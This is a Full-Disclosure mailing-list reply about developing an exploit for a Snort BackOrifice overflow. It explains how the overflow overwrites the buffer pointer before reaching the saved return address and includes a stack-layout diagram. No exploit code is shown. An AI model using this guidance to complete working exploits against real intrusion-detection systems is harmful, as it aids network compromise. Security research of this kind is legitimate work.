Re: Snort BackOrifice Fun

["Krpata, Tyler" <tkrpata () bjs com>]

> Attached some in-progress code for the snort bug, getting through the 
> while() loop that modifies both 'i' and 'len' is annoying. Any ideas
on 
> making this more reliable? It works great on my -ggdb version , but
runs 
> off a page during a memcmp() on my normal binary.

 The problem is that you reach a point (coincidentally a page before
eip) where you start to clobber the pointer that is being used to copy
your user data into memory. Once that happens you're no longer writing
to the location you want to be writing to. 

*****************************************

Bf??????? [41414141] len
Bf??????? [41414141] id
Bf??????? [41414141] l
Bf??????? [41414141] i
Bf??????? [41414141] type
Bf??????? [Bf????41] buf_ptr
Bf??????? [????????]
Bf??????? [????????]
Bf??????? [????????] eip

*****************************************

Somewhere else...
Bf????41 [41414141] 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/